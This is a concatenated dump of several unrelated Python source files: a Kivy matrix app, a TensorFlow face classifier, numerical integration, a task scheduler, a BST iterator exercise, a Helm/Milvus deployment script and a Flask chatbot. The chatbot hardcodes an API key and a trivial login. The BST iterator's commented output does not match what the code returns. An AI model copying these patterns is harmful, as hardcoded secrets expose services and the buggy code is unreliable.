*args):\r\n\t\tself.canvas.after.clear()\r\n\t\twith self.canvas.after:\r\n\t\t\tColor(rgba = (1,0,0,1))\r\n\t\t\tLine(points=(self.matriz[0][0].center_x, self.matriz[0][0].center_y,self.matriz[1][1].center_x, self.matriz[1][1].center_y), width=5)\r\n\t\t\tColor(rgba = (0,1,0,1))\r\n\t\t\tLine(points=(self.matriz[0][1].center_x, self.matriz[0][1].center_y,self.matriz[1][0].center_x, self.matriz[1][0].center_y), width=5)\r\n\t\t\t\r\n\t\t\r\n\tdef determinante_3(self, *args):\r\n\t\tm = 0\r\n\t\tself.canvas.after.clear()\r\n\t\twith self.canvas.after:\r\n\t\t\tfor c in range(0,3):\r\n\t\t\t\tColor(rgba = (1,0,0,1))\r\n\t\t\t\tLine(points=(self.matriz[m][2].center_x, self.matriz[m][2].center_y,self.matriz[m+1][1].center_x, self.matriz[m+1][1].center_y,self.matriz[m+2][0].center_x, self.matriz[m+2][0].center_y), width=5)\r\n\t\t\t\tColor(rgba = (0,1,0,1))\r\n\t\t\t\tLine(points=(self.matriz[m][0].center_x, self.matriz[m][0].center_y,self.matriz[m+1][1].center_x, self.matriz[m+1][1].center_y,self.matriz[m+2][2].center_x, self.matriz[m+2][2].center_y), width=5)\r\n\t\t\t\t\r\n\t\t\t\tm+=1\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\t\t\t\r\n\r\nclass Label_branca(BoxLayout):\r\n\t\r\n\ttexto = ''\r\n\t\r\n\tdef __init__(self, text, **kw):\r\n\t\tsuper(Label_branca, self).__init__(**kw)\r\n\t\tself.ids.texto.text = text\r\n\t\t\r\n\r\n\r\nclass Fundo(BoxLayout):\r\n\tpass\r\n\r\n\r\n \r\nclass Main(App):\r\n \r\n def build(self):\r\n \treturn Juntos()\r\n \r\n \r\nif __name__ == '__main__':\r\n Main().run() \r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":49285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"273119170","text":"# -*- coding:utf-8 -*-\n\nimport os\nimport sys\nimport random\nimport numpy as np\nimport tensorflow as tf\n\nlabel_dict = {\n 'akb': 0, 'saka': 1\n}\n\nu'''\n データの読み込み\n INPUT:data_type | test/train\n'''\ndef load_data(data_type):\n filenames, images, labels = [], [], []\n\n # os.walkでfacesフォルダ内をサーチする\n # filter(func, iter):iterをfuncで処理してTrueを返したものだけをiterObjとする\n u''' faces下でdata_typeフォルダ下で、長さのあるものだけ取り出したiterObjをつくる\n これを root,_(dirs),filesでうけとり、filenamesにどんどん入れる。その過程で\".\"から始まる\n ファイルについては無視する。(.DS_Storeとか)\n '''\n walk = filter(lambda _: not len(_[1]) and data_type in _[0], os.walk('faces'))\n for root, _, files in walk:\n filenames += ['{}/{}'.format(root, _) for _ in files if not _.startswith('.')]\n \n # ファイルをランダムに並び替える\n random.shuffle(filenames)\n\n # ファイルを読みこみ、サイズを調整し、配列に落とし込む\n # channel = 1 :grayscale, 3:RGB\n images = map(lambda _: tf.image.decode_jpeg(tf.read_file(_), channels=3), filenames)\n images = map(lambda _: tf.image.resize_images(_, [32, 32]), images)\n images = map(lambda _: tf.reshape(_, [-1]), images)\n\n for filename in filenames:\n label = np.zeros(2)\n for k, v in label_dict.items(): # kはラベル文字列, vはインデックス(正解の箇所だけ1で他は0になる)\n if k in filename:\n label[v] = 1.\n labels.append(label) \n\n return list(images), labels, filenames\n\n\ndef get_batch_list(l, batch_size):\n # [1, 2, 3, 4, 5,...] -> [[1, 2, 3], [4, 5,..]]\n return [np.asarray(l[_:_+batch_size]) for _ in range(0, len(l), batch_size)]\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n\ndef inference(images_placeholder, keep_prob):\n # Convolution layer\n x_image = tf.reshape(images_placeholder, [-1, 32, 32, 3])\n W_conv1 = weight_variable([5, 5, 3, 32])\n b_conv1 = bias_variable([32])\n h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\n\n # Pooling layer\n h_pool1 = max_pool_2x2(h_conv1)\n\n # Convolution layer\n W_conv2 = weight_variable([5, 5, 32, 64])\n b_conv2 = bias_variable([64])\n h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n\n # Pooling layer\n h_pool2 = max_pool_2x2(h_conv2)\n\n # Full connected layer\n W_fc1 = weight_variable([8 * 8 * 64, 1024])\n b_fc1 = bias_variable([1024])\n h_pool2_flat = tf.reshape(h_pool2, [-1, 8 * 8 * 64])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n # Dropout\n h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n # Full connected layer\n W_fc2 = weight_variable([1024, 2])\n b_fc2 = bias_variable([2])\n\n return tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\nu'''\nメイン関数\n'''\ndef main():\n with tf.Graph().as_default():\n # trainフォルダおよびtestフォルダ下の画像をラベル付きでロードする\n train_images, train_labels, filenames = load_data('train')\n test_images, test_labels ,filenames = load_data('test')\n \n # 入力xのフォーマット定義:[入力数, 画像情報(32*32*3)]\n x = tf.placeholder('float', shape=[None, 32 * 32 * 3]) # 32 * 32, 3 channels\n # 出力yのフォーマット定義:[入力数, 結果クラス数(2)]\n y_ = tf.placeholder('float', shape=[None, 2]) # 2 classes\n\n # prob\n keep_prob = tf.placeholder('float')\n\n y_conv = inference(x, keep_prob)\n\n # Loss function\n cross_entropy = -tf.reduce_sum(y_ * tf.log(y_conv))\n tf.summary.scalar('cross_entropy', cross_entropy)\n # Minimize cross entropy by using SGD\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n # Accuracy\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float'))\n tf.summary.scalar('accuracy', accuracy)\n\n saver = tf.train.Saver()\n sess = tf.InteractiveSession()\n sess.run(tf.global_variables_initializer())\n\n summary_op = tf.summary.merge_all()\n summary_writer = tf.summary.FileWriter('./logs', sess.graph)\n\n batched_train_images = get_batch_list(train_images, 25)\n batched_train_labels = get_batch_list(train_labels, 25)\n\n train_images = list(map(lambda _: sess.run(_).astype(np.float32) / 255.0, np.asarray(train_images)))\n test_images = list(map(lambda _: sess.run(_).astype(np.float32) / 255.0, np.asarray(test_images)))\n train_labels, test_labels = np.asarray(train_labels), np.asarray(test_labels)\n\n # Train\n for step, (images, labels) in enumerate(zip(batched_train_images, batched_train_labels)):\n images = list(map(lambda _: sess.run(_).astype(np.float32) / 255.0, images))\n sess.run(train_step, feed_dict={ x: images, y_: labels, keep_prob: 0.5 })\n train_accuracy = accuracy.eval(feed_dict = {\n x: train_images, y_: train_labels, keep_prob: 1.0 })\n print(\"step:\"+str(step))\n print(\"accracy:\"+str(train_accuracy))\n #print \"step {0} training accuracy {1}\".format(step, train_accuracy)\n summary_str = sess.run(summary_op, feed_dict={\n x: train_images, y_: train_labels, keep_prob: 1.0 })\n summary_writer.add_summary(summary_str, step)\n # Test trained model\n test_accuracy = accuracy.eval(feed_dict = {\n x: test_images, y_: test_labels, keep_prob: 1.0 })\n print (\"test accuracy\"+str(test_accuracy))\n # Save model\n save_path = saver.save(sess, \"/Users/motchy83/Documents/WorkSpace/GitDir/AreYouAKB/models/model.ckpt\")\n\nu'''\n\b判定\n'''\ndef main2():\n with tf.Graph().as_default():\n test_images, test_labels, filenames = load_data('experiment')\n x = tf.placeholder('float', shape=[None, 32 * 32 * 3]) # 32 * 32, 3 channels\n y_ = tf.placeholder('float', shape=[None, 2]) # 2 classes\n keep_prob = tf.placeholder('float')\n\n y_conv = inference(x, keep_prob)\n\n sess = tf.InteractiveSession()\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n saver.restore(sess, \"/Users/motchy83/Documents/WorkSpace/GitDir/AreYouAKB/models/model.ckpt\")\n\n test_images = list(map(lambda _: sess.run(_).astype(np.float32) / 255.0, np.asarray(test_images)))\n\n idn = 0\n Akb = 0\n Saka = 0\n for filename in filenames:\n # print (filename)\n print (y_conv.eval(feed_dict={ x: [test_images[idn]], keep_prob: 1.0 })[0])\n if 0 == np.argmax(y_conv.eval(feed_dict={ x: [test_images[idn]], keep_prob: 1.0 })[0]):\n print(filename + \":AKB\")\n Akb += 1\n else:\n print(filename + \":SAKA\")\n Saka += 1\n idn += 1\n \n print(Akb/idn)\n print(Saka/idn)\n \n\nu'''\nここから開始する\n'''\nif __name__ == '__main__':\n args = sys.argv\n if len(args) == 1:\n main2()\n elif \"Learn\" == args[1]:\n main()\n else:\n main2()\n\n","sub_path":"CNN_Learn.py","file_name":"CNN_Learn.py","file_ext":"py","file_size_in_byte":7704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"166618873","text":"import json\nfrom aiohttp import web\nimport aiopg\n\nfrom async_db import get_row, get_pool\n\n\nasync def handle(request):\n a, b = await get_row()\n return web.Response(text=json.dumps({\n \"a\": str(a).zfill(10),\n \"b\": b\n }))\n\n\nasync def close_db(app_):\n pool = await get_pool()\n pool.close()\n await pool.wait_closed()\n\n\napp = web.Application()\napp.on_shutdown.append(close_db)\napp.add_routes([web.get('/test', handle)])\n","sub_path":"app_aio.py","file_name":"app_aio.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"215458083","text":"from math import sqrt, sin\n\ndef f1(x):\n return 1 / sqrt(2 + 0.5 * x**2) \n\n\na = 0.4\nb = 1.2\nn = 10\n\ndef f2(x):\n return sin(2*x) / x**2\n\n\n\ndef drange(start, stop, step):\n r = start\n while r <= stop:\n \tyield r\n \tr += step\n\n\ndef trap (func, a, b, n):\n \"\"\" Computes an integral of a func from a to b using \"\"\"\n \n xs = [x for x in drange(a, b, (b-a) / n)]\n ys = [f1(x) for x in xs]\n \n res = sum([(ys[i] + ys[i+1]) * (xs[i+1] - xs[i]) / 2 for i in range(n)])\n\n return res, len(xs), n\n\n\ndef simpson (f, start, stop, n):\n\n res = 0\n i = (stop - start) / n\n a = start\n b = start + i\n\n while b <= stop:\n res += (b-a) * (f(a) + 4 * f((a + b) / 2) + f(b)) / 6\n a += i\n b += i\n\n return res\n\n\n\n\nif __name__ == '__main__':\n print(\"Формула трапеций: \")\n print(trap(f1, a, b, n))\n\n print(\"=\" * 20 + \"\\n\")\n print(\"Формула Симсона: \")\n\n print(simpson(f2, 0.8, 1.2, 80))\n\n\n\n","sub_path":"int1.py","file_name":"int1.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"604837119","text":"from dateutil.relativedelta import relativedelta\nfrom datetime import datetime\nfrom prosys.model.task import Task, TaskChunk\nfrom prosys.use_cases.response import Response\nfrom schema import Schema, Optional, Or\n\n\nclass TaskInteractor(object):\n \"\"\"docstring for TaskInteractor\"\"\"\n\n def __init__(self, repo):\n self.repo = repo\n self.schema = Schema({\n Optional('id'): Or(int, str, None),\n Optional('master_task_id'): Or(int, str, None),\n Optional('project_id'): Or(str, int),\n Optional('name'): str,\n Optional('prio'): int,\n Optional('scheduled'): {\n 'date': str,\n Optional('freq'): str,\n Optional('repeat_limit'): int\n }\n })\n\n def get_tasks(self, filters=None, hierarchy=False):\n response = Response()\n tasks = self.repo.get_tasks()\n by_id = False\n if isinstance(filters, dict):\n by_id = 'id' in filters and filters['id'] is not None\n if by_id:\n tasks = self.repo.get_task_by_id(filters['id'])\n else:\n if ('date_begin' in filters and 'date_end' in filters):\n sort_by_date = 'sort_date' in filters\n tasks = self.get_tasks_between_dates(\n filters['date_begin'],\n filters['date_end'], sort_by_date)\n tasks = self.filtered_tasks(tasks, filters)\n if not hierarchy or by_id:\n response.value = tasks\n else:\n response.value = self._structure_tasks(tasks)\n return response\n\n def _structure_tasks(self, tasks):\n project_tasks = {}\n for task in tasks:\n if task.project.id not in project_tasks:\n project_tasks[task.project.id] = []\n project_tasks[task.project.id].append(task)\n return project_tasks\n\n def filtered_tasks(self, tasks, filters):\n return [task for task in tasks if\n task.name == filters.get('name', task.name) and\n task.project.id == filters.get('project_id',\n task.project.id) and\n task.prio == filters.get('prio', task.prio) and\n task.started == filters.get('started', task.started) and\n task.done == filters.get('done', task.done)]\n\n def get_tasks_between_dates(self, date_begin, date_end, sort=False):\n tasks = self.repo.get_tasks()\n delta = date_end - date_begin\n dates = [date_begin + relativedelta(\n days=i) for i in range(abs(delta.days) + 1)]\n tasks = [task for task in tasks if any(\n self._task_occurs_on_date(date, task) for date in dates)]\n if sort:\n tasks.sort(key=lambda task: task.scheduled.date)\n return tasks\n\n def get_task_history(self, date_begin, date_end, sort=True):\n resp = Response()\n if date_begin is None or date_end is None:\n resp.add_error({'missing param':\n 'begin date or end date is missing'})\n return resp\n if isinstance(date_begin, datetime):\n date_begin = datetime.date()\n if isinstance(date_end, datetime):\n date_end = datetime.date()\n chunks = self.repo.get_task_chunks()\n chunks = [chunk for chunk in chunks if\n chunk.started.date() >= date_begin and\n chunk.started.date() <= date_end]\n if sort:\n chunks.sort(key=lambda chunk: chunk.started)\n resp.value = chunks\n return resp\n\n def _task_occurs_on_date(self, date, task):\n sd = task.scheduled_day()\n if sd is None:\n return False\n if sd == date:\n return True\n if sd > date:\n return False\n freq = task.scheduled.freq\n if freq is None:\n return False\n # if occurs every day\n if freq == relativedelta(days=1):\n return True\n # if occurs every week and same day\n if sd.weekday() == date.weekday() and freq == relativedelta(weeks=1):\n return True\n if freq == relativedelta(weekday=date.weekday()):\n return True\n # every n days\n if relativedelta(days=freq.days) == freq and freq.days > 0:\n diff = relativedelta(sd, date)\n n = diff / freq.days\n if n * freq.days == diff:\n return True\n # if occurs every n months, same day\n if relativedelta(months=freq.months) == freq and freq.months > 0:\n diff = relativedelta(sd, date)\n n = diff / freq.months\n if n * freq.months == diff:\n return True\n return False\n\n def save_task(self, task_req):\n response = Response()\n task = None\n master_task_id = task_req.get('master_task_id', None)\n try:\n # Editing an existing task\n if 'id' in task_req and task_req['id'] is not None:\n task = self.repo.get_task_by_id(task_req['id'])\n if task is None:\n response.add_error({'invalid param': 'task id not found'})\n else:\n self._edit_task(task, task_req)\n # Creating new task\n else:\n if ('project_id' not in task_req and\n 'master_task_id' not in task_req):\n response.add_error({\n 'missing param':\n 'project_id and master_task_id is missing'})\n else:\n if 'project_id' in task_req:\n task_req['project'] = self.repo.get_project_by_id(\n task_req['project_id'])\n else:\n master_task = self.repo.get_task_by_id(master_task_id)\n task_req['prio'] = master_task.prio\n task_req['project'] = master_task.id\n if task_req['project'] is None:\n response.add_error({'invalid param':\n 'project not found'})\n else:\n task = Task.from_dict(task_req)\n except KeyError as e:\n response.add_error({'missing param': e.args[0] + ' is missing'})\n\n if not response:\n return response\n\n response = self._validate_task(task)\n if response:\n self.repo.save_task(task, self.repo.get_task_by_id(master_task_id))\n response.message = 'task saved'\n return response\n\n def _edit_task(self, task, task_req):\n task.name = task_req.get('name', task.name)\n task.prio = task_req.get('prio', task.prio)\n task.scheduled = task_req.get('scheduled', task.scheduled)\n\n def delete_task(self, task_id):\n response = self._get_task_with_response(task_id)\n if response:\n self.repo.delete_task(task_id)\n response.message = 'task deleted'\n return response\n\n def _exec_task_fn(self, task_id, fn, message):\n response = self._get_task_with_response(task_id)\n if response:\n fn(response.value)\n response.message = message\n self.repo.save_task(response.value)\n return response\n\n def complete_task(self, task_id):\n resp = self._exec_task_fn(task_id, Task.complete, 'task completed')\n if resp and resp.value.scheduled_day() is None:\n self.repo.delete_task(task_id)\n return resp\n\n def postpone_task(self, task_id):\n return self._exec_task_fn(task_id, Task.postpone, 'task postponed')\n\n def start_task(self, task_id):\n return self._exec_task_fn(task_id, Task.start, 'task started')\n\n def stop_task(self, task_id):\n res = self._get_task_with_response(task_id)\n if not res:\n return res\n task_chunk = None\n task = res.value\n if task.started:\n task_chunk = TaskChunk(task, task.start_time, datetime.now())\n self.repo.save_task_chunk(task_chunk)\n task.stop()\n self.repo.save_task(task)\n res.message = 'task stopped'\n return res\n\n def _validate_task(self, task):\n response = Response()\n if task.prio < 1 or task.prio > 5:\n response.add_error({'invalid param':\n 'priority must be between 1 and 5'})\n if response:\n response.value = task\n return response\n\n def _get_task_with_response(self, task_id):\n response = Response()\n task = self.repo.get_task_by_id(task_id)\n if task is None:\n response.add_error({'invalid param': 'task id not found'})\n else:\n response.value = task\n return response\n","sub_path":"prosys.server/prosys/use_cases/task_interactor.py","file_name":"task_interactor.py","file_ext":"py","file_size_in_byte":8917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"527714935","text":"\"\"\"\n173. Binary Search Tree Iterator\nMedium\n\n1312\n\n237\n\nFavorite\n\nShare\nImplement an iterator over a binary search tree (BST). Your iterator will be initialized with the root node of a BST.\n\nCalling next() will return the next smallest number in the BST.\n\n \n\nExample:\n\n\n\nBSTIterator iterator = new BSTIterator(root);\niterator.next(); # return 3\niterator.next(); # return 7\niterator.hasNext(); # return true\niterator.next(); # return 9\niterator.hasNext(); # return true\niterator.next(); # return 15\niterator.hasNext(); # return true\niterator.next(); # return 20\niterator.hasNext(); # return false\n \n\nNote:\n\nnext() and hasNext() should run in average O(1) time and uses O(h) memory, where h is the height of the tree.\n\"\"\"\nclass Node:\n def __init__(self, data):\n self.val = data\n self.left = None\n self.right = None\n\nclass BSTIterator:\n def __init__(self, data):\n self.root = Node(data)\n self.stack = []\n\n def in_order_traversal(self, start):\n if start:\n traversal = self.in_order_traversal(start.left)\n self.stack.append(start.val)\n traversal = self.in_order_traversal(start.right)\n return 1\n\n def print_tree(self):\n node = self.root\n self.in_order_traversal(node)\n return self\n\n def hasNext(self):\n #print(dir(stack))\n return len(self.stack) != 0\n\n def next(self):\n if self.hasNext():\n print('hn')\n next_item = self.stack.pop()\n return next_item\n return -1\n\n\ntree = BSTIterator(7)\ntree.root.left = Node(3)\ntree.root.right = Node(15)\ntree.root.right.left = Node(9)\ntree.root.right.right = Node(20)\n\niterator = tree.print_tree()\nprint(iterator.next()); # return 3\nprint(iterator.next()); # return 7\nprint(iterator.hasNext()); # return true\nprint(iterator.next()); # return 9\nprint(iterator.hasNext()); # return true\nprint(iterator.next()); # return 15\nprint(iterator.hasNext()); # return true\nprint(iterator.next()); # return 20\nprint(iterator.hasNext()); # return false\n\n\"\"\"\n3\n7\nTrue\n9\nTrue\n15\nTrue\n20\nFalse\n\"\"\"","sub_path":"fb/binary_tree_itertor_1.py","file_name":"binary_tree_itertor_1.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"569623622","text":"import os\n\nfrom scale import constants\nfrom utils.util_log import test_log as log\nfrom common import common_func as cf\n\n\ndef get_milvus_chart_env_var(var=constants.MILVUS_CHART_ENV):\n \"\"\" get log path for testing \"\"\"\n try:\n milvus_helm_chart = os.environ[var]\n return str(milvus_helm_chart)\n except Exception as e:\n log.error(f'Failed to get environment variables {var}, with exception {str(e)}')\n\n\nclass HelmEnv:\n milvus_chart_path = get_milvus_chart_env_var()\n\n def __init__(self, release_name=None, **kwargs):\n self.release_name = release_name if release_name else cf.gen_unique_str(constants.DEFAULT_RELEASE_PREFIX)\n self.proxy = kwargs.get(constants.PROXY, 1)\n self.data_node = kwargs.get(constants.DATA_NODE, 1)\n self.index_node = kwargs.get(constants.INDEX_NODE, 1)\n self.query_node = kwargs.get(constants.QUERY_NODE, 1)\n\n def helm_install_cluster_milvus(self, image_pull_policy=constants.IF_NOT_PRESENT):\n \"\"\"\n default deploy cluster milvus with only one xxxNode\n helm install --wait --timeout 180s --set image.all.repository=milvusdb/milvus-dev --set image.all.tag=master-latest\n --set cluster.enabled=true --set service.type=LoadBalancer\n --set image.all=Always clu-zong .\n :param image_pull_policy: image pullPolicy includes: IF_NOT_PRESENT and ALWAYS\n :param kwargs: PROXY, DATA_NODE, INDEX_NODE, QUERY_NODE\n :return: svc ip\n \"\"\"\n install_cmd = f'helm install --wait --timeout 360s ' \\\n f'--set image.all.repository={constants.IMAGE_REPOSITORY} ' \\\n f'--set image.all.tag={constants.IMAGE_TAG} ' \\\n f'--set cluster.enabled=true ' \\\n f'--set service.type=LoadBalancer ' \\\n f'--set image.all.pullPolicy={image_pull_policy} ' \\\n f'--set proxy.replicas={self.proxy} ' \\\n f'--set dataNode.replicas={self.data_node} ' \\\n f'--set indexNode.replicas={self.index_node} ' \\\n f'--set queryNode.replicas={self.query_node} ' \\\n f'{self.release_name} . '\n log.debug(f'install_cmd: {install_cmd}')\n try:\n os.system(f'cd {self.milvus_chart_path} && {install_cmd}')\n except Exception:\n raise Exception(\"Failed to deploy cluster milvus\")\n return self.get_service_ip()\n\n def helm_upgrade_cluster_milvus(self, **kwargs):\n \"\"\"\n scale milvus pod num by helm upgrade\n when upgrading pod nums, other --set need to be the same as helm install\n :param kwargs: PROXY, DATA_NODE, INDEX_NODE, QUERY_NODE\n :return: None\n \"\"\"\n proxy = kwargs.get(constants.PROXY, self.proxy)\n data_node = kwargs.get(constants.DATA_NODE, self.data_node)\n index_node = kwargs.get(constants.INDEX_NODE, self.index_node)\n query_node = kwargs.get(constants.QUERY_NODE, self.query_node)\n upgrade_cmd = f'helm upgrade {self.release_name} . ' \\\n f'--set proxy.replicas={proxy} ' \\\n f'--set dataNode.replicas={data_node} ' \\\n f'--set indexNode.replicas={index_node} ' \\\n f'--set queryNode.replicas={query_node} ' \\\n f'--reuse-values'\n log.debug(f'upgrade_cmd: {upgrade_cmd}')\n if os.system(f'cd {self.milvus_chart_path} && {upgrade_cmd}'):\n raise Exception(f'Failed to upgrade cluster milvus with {kwargs}')\n\n def helm_uninstall_cluster_milvus(self):\n \"\"\"\n helm uninstall and delete etcd pvc\n :return:\n \"\"\"\n uninstall_cmd = f'helm uninstall {self.release_name}'\n if os.system(uninstall_cmd):\n raise Exception(f'Failed to uninstall {self.release_name}')\n # delete etcd pvc\n delete_pvc_cmd = f'kubectl delete pvc data-{self.release_name}-etcd-0'\n if os.system(delete_pvc_cmd):\n raise Exception(f'Failed to delete {self.release_name} etcd pvc')\n\n def get_service_ip(self):\n \"\"\"\n get deployed milvus service host\n :return: str ip\n \"\"\"\n from kubernetes import client, config\n # from kubernetes.client.rest import ApiException\n config.load_kube_config()\n v1 = client.CoreV1Api()\n service = v1.read_namespaced_service(f'{self.release_name}-milvus', constants.NAMESPACE)\n return service.status.load_balancer.ingress[0].ip\n\n def export_all_logs(self):\n \"\"\"\n export all cluster logs to /tmp/milvus, and temporarily missing minio pod logs\n :return: export all pods' log to constants.MILVUS_LOGS_PATH\n \"\"\"\n pods = self.list_all_pods()\n for pod in pods:\n os.system(f'kubectl logs {pod} > {constants.MILVUS_LOGS_PATH}/{pod}.log 2>&1')\n\n def list_all_pods(self):\n \"\"\"\n list all pods of this release\n :return: list pods\n \"\"\"\n from kubernetes import client, config\n config.load_kube_config()\n v1 = client.CoreV1Api()\n label_selector = f'app.kubernetes.io/instance={self.release_name}'\n ret = v1.list_namespaced_pod(namespace=constants.NAMESPACE, label_selector=label_selector)\n pods = []\n for i in ret.items:\n pods.append(i.metadata.name)\n return pods\n\n\nif __name__ == '__main__':\n # default deploy q replicas\n release_name = \"scale-proxy\"\n env = HelmEnv(release_name=release_name)\n # env.helm_install_cluster_milvus()\n # host = env.get_service_ip()\n # env.helm_upgrade_cluster_milvus(queryNode=2)\n # env.helm_uninstall_cluster_milvus()\n env.export_all_logs()\n","sub_path":"tests/python_client/scale/helm_env.py","file_name":"helm_env.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"489590177","text":"#!/usr/bin/python3\ndef contaVogais(palavra):\n total = 0\n \n for letra in palavra:\n if letra in \"aeiouAEIOU\":\n total += 1\n return total\n\ndef maiorPalavra(lista):\n\ttam,maior = 0,''\n\t\n\tfor x in lista:\n\t\tif len(x) > tam:\n\t\t\ttam = len(x)\n\t\t\tmaior = x\n\treturn maior\n\ndef contaPalindromos(lista):\n total = 0\n \n for p in lista:\n if p == p[::-1]:\n total += 1\n \n return total\n\ndef main():\n\tpalavras,totalVogais,totalDigitos,aux = [],0,0,'teste'\n\t\n\twhile(aux != ''):\n\t\tprint(\"Para encerrar, aperte a tecla .\")\n\t\taux = input(\"Digite alguma coisa: \")\n\t\t\n\t\tif aux != '':\n\t\t\ttotalVogais += contaVogais(aux)\n\t\t\ttotalDigitos += len(aux)\n\t\t\tpalavras.append(aux)\n\t\n\tprint()\n\tprint(\"============== RELATÓRIO ==============\")\n\tprint()\n\tprint(\"Palavras:\",palavras)\n\tprint()\n\tprint(\"Total de vogais:\",totalVogais)\n\tprint()\n\tprint(\"Total de dígitos:\",totalDigitos)\n\tprint()\n\tprint(\"Maior palavra digitada:\",maiorPalavra(palavras))\n\tprint()\n\tprint(\"Quantidade de palavras palíndromas:\",contaPalindromos(palavras))\n\nif __name__ == '__main__':\n\tmain()","sub_path":"questao2.py","file_name":"questao2.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"371512981","text":"import http.client\r\nimport urllib.parse\r\nimport json\r\nimport time\r\nimport re\r\n\r\nfrom flask import Flask, jsonify, render_template, request\r\n\r\napplication = Flask(__name__)\r\nhost = \"jonhlegal.azurewebsites.net\"\r\nendpoint_key = \"ad3bbe8d-0074-4911-a2ff-8b0914a11623\"\r\nkb = \"98d8aa51-8b03-440d-b66d-933db6f17e37\"\r\nmethod = \"/qnamaker/knowledgebases/\" + kb + \"/generateAnswer\"\r\n\r\n\r\ndef pretty_print(content):\r\n return json.dumps(json.loads(content), indent=4)\r\n\r\n\r\ndef get_answers(path, content):\r\n headers = {\r\n 'Authorization': 'EndpointKey ' + endpoint_key,\r\n 'Content-Type': 'application/json',\r\n 'Content-Length': len(content)\r\n }\r\n conn = http.client.HTTPSConnection(host)\r\n conn.request(\"POST\", path, content, headers)\r\n response = conn.getresponse()\r\n return response.read()\r\n\r\n\r\ndef put_question(text):\r\n question = {\"question\": text}\r\n content = json.dumps(question)\r\n result = get_answers(method, content)\r\n # print(pretty_print(result))\r\n info = json.loads(result)\r\n # print(info.keys())\r\n if float(info[\"answers\"][0][\"score\"]) < 30.0:\r\n return \"Sobre essa questão ainda não tenho entendimento, me dê um tempinho para aprender e depois eu respondo para você.\"\r\n else:\r\n return info[\"answers\"][0][\"answer\"]\r\n\r\n\r\n@application.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef index():\r\n if request.method == \"POST\":\r\n username = request.form[\"username\"]\r\n password = request.form[\"password\"]\r\n if username == \"john\" and password == \"john\":\r\n return render_template(\"index.html\")\r\n return render_template(\"login.html\")\r\n\r\n\r\n@application.route(\"/ask/\", methods=[\"GET\"])\r\ndef ask(message):\r\n return jsonify(put_question(message))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n application.run()\r\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"145587780","text":"# -*- coding: UTF-8 -*-\n\"\"\"TO-DO: Write a description of what this XBlock is.\"\"\"\n\nimport pkg_resources\nimport os\nfrom mako.template import Template\nfrom xblock.core import XBlock\nfrom xblock.fields import Scope, Integer, String, Boolean, Dict\nfrom xblock.fragment import Fragment\nimport urllib\n\n# dict_key_url = {\n# \"sudoku\":u\"九宫格(暖场游戏)\",\n# \"challenge_memory\":u\"挑战记忆(暖场游戏)\",\n# \"who_is_a_close_friend\":u\"谁是密友(暖场游戏)\",\n# \"tokyo_tower\":u\"东京铁塔(沟通游戏)\",\n# \"picasso\":u\"毕加索(沟通游戏)\",\n# \"plane_crashed\":u\"飞机坠落(沟通游戏)\",\n# \"one_yuan_a_few_house\":u\"一元几豪(思维游戏)\",\n# \"i_laugh_you_cry\":u\"我笑你哭(轻松游戏)\",\n# }\n# dict_key_value = {\n# \"sudoku\":u\"九宫格(暖场游戏)\",\n# \"challenge_memory\":u\"挑战记忆(暖场游戏)\",\n# \"who_is_a_close_friend\":u\"谁是密友(暖场游戏)\",\n# \"tokyo_tower\":u\"东京铁塔(沟通游戏)\",\n# \"picasso\":u\"毕加索(沟通游戏)\",\n# \"plane_crashed\":u\"飞机坠落(沟通游戏)\",\n# \"one_yuan_a_few_house\":u\"一元几豪(思维游戏)\",\n# \"i_laugh_you_cry\":u\"我笑你哭(轻松游戏)\",\n# }\nclass GameXBlock(XBlock):\n \"\"\"\n TO-DO: document what your XBlock does.\n \"\"\"\n\n # Fields are defined on the class. You can access them in your code as\n # self..\n\n # TO-DO: delete count, and define your own fields.\n display_name = String(display_name=\"Display Name\",\n default=u\"游戏\",\n scope=Scope.settings,\n help=\"This name appears in the horizontal navigation at the top of the page.\")\n\n image_url = String(display_name=\"Display Name\",\n default=\"\",\n scope=Scope.content,\n help=\"This name appears in the horizontal navigation at the top of the page.\")\n\n # func_key = String(display_name=\"\",\n 